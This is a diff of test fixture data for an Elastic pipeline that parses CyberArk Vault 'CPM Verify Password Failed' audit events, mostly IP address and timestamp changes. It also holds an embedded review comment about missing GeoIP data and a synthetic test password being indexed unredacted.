State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=127.0.0.1;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"127.0.0.1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615829597\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"mysql\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:33:17\",\"IsoTimestamp\":\"2021-03-15T17:33:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\",\"ExtraDetails\":\"address=127.0.0.1;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"127.0.0.1\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615829597\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"DSN\",\"Value\":\"mysql\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", 
@@ -1366,7 +1311,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length", - "ingested": "2021-06-09T10:24:34.493932Z", + "ingested": "2021-12-09T13:37:01.193660Z", "original": "\u003c7\u003e1 2021-03-15T17:38:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 10:38:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T17:38:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=127.0.0.1;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"127.0.0.1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615829907\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"Driver={MySQL ODBC 5.3 Unicode Driver};server=%ADDRESS%;user=%USER%;option=3;port=%PORT%;Password=%LOGONPASSWORD%\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 10:38:27\",\"IsoTimestamp\":\"2021-03-15T17:38:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\\n\",\"ExtraDetails\":\"address=127.0.0.1;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"127.0.0.1\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615829907\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"DSN\",\"Value\":\"Driver={MySQL ODBC 5.3 Unicode Driver};server=%ADDRESS%;user=%USER%;option=3;port=%PORT%;Password=%LOGONPASSWORD%\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", 
@@ -1475,7 +1420,7 @@ "event": { "severity": 7, "reason": "Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified", - "ingested": "2021-06-09T10:24:34.493934Z", + "ingested": "2021-12-09T13:37:01.193665900Z", "original": "\u003c7\u003e1 2021-03-15T18:00:07Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 11:00:07\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T18:00:07Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MySQL-10.0.1.20-root\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=Driver\\\\={MySQL ODBC 5.3 Unicode Driver}\\\\;server\\\\=127.0.0.1\\\\;user\\\\=root\\\\;option\\\\=3\\\\;port\\\\=3306\\\\;Password\\\\=1234;username=root;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MySQL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"Driver={MySQL ODBC 5.3 Unicode Driver};server=127.0.0.1;user=root;option=3;port=3306;Password=1234\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615831206\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DSN\\\" Value=\\\"mysql\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error when verifypass to User root on Server . 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 11:00:07\",\"IsoTimestamp\":\"2021-03-15T18:00:07Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-MySQL-10.0.1.20-root\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . 
State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\\n\",\"ExtraDetails\":\"address=Driver\\\\={MySQL ODBC 5.3 Unicode Driver}\\\\;server\\\\=127.0.0.1\\\\;user\\\\=root\\\\;option\\\\=3\\\\;port\\\\=3306\\\\;Password\\\\=1234;username=root;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MySQL\"},{\"Name\":\"UserName\",\"Value\":\"root\"},{\"Name\":\"Address\",\"Value\":\"Driver={MySQL ODBC 5.3 Unicode Driver};server=127.0.0.1;user=root;option=3;port=3306;Password=1234\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615831206\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"DSN\",\"Value\":\"mysql\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "38", "kind": "event", @@ -1499,22 +1444,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", "user": { "name": "ELASTIC.local\\bart" }, - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { 
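Review bot: The rebuilt `destination` object for 67.43.156.15 in the @@ -1499,22 +1444,11 @@ hunk has no `geo` block at all, while the removed lines show the previous address resolving to continent, country, region and location; 67.43.156.15 is one of the addresses the stack's GeoIP test database is expected to resolve, so an empty result here looks like the file was regenerated against a stack without that database loaded or the geoip processor is not applied to `destination.ip`, and it is worth regenerating with `elastic-package test pipeline -g` on a fresh stack to confirm `destination.geo` comes back. The same drop appears in the @@ -1621,22 +1555,11 @@ hunk further down. Separately, the `event.ingested` rewrites in @@ -1366,7 +1311,7 @@ and @@ -1475,7 +1420,7 @@ are pure timestamp churn; if `event.ingested` is not already listed under `dynamic_fields` in the data stream's pipeline test config, adding it there keeps regeneration from touching those lines. Finally, the context lines of @@ -1475,7 +1420,7 @@ show a MySQL DSN with `Password=1234` carried verbatim in `ExtraDetails` and the `Address` property; the value is synthetic, but it documents that the pipeline indexes connection-string secrets from the audit record unredacted, which the data stream documentation should state so operators can decide whether to drop or mask those fields.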
@@ -1537,7 +1471,7 @@
 },
 "@timestamp": "2021-03-15T18:05:16.000Z",
 "file": {
- "path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart"
+ "path": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart"
 },
 "ecs": {
 "version": "1.12.0" 
@@ -1549,28 +1483,28 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n", + "reason": "ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n", "iso_timestamp": "2021-03-15T18:05:16Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 11:05:16\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T18:05:16Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-34.66.114.180-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n 
\u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=3;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"3\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615831516\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). 
\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 11:05:16\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T18:05:16Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=3;username=ELASTIC.local\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"3\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615831516\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). 
\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Verify Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "3", - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC.local\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -1579,11 +1513,11 @@ "retries_count": "3", "reset_immediately": "VerifyTask", "last_task": "VerifyTask", - "cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ", + "cpm_error_details": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", "last_fail_date": "1615831516", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Verify Password Failed", 
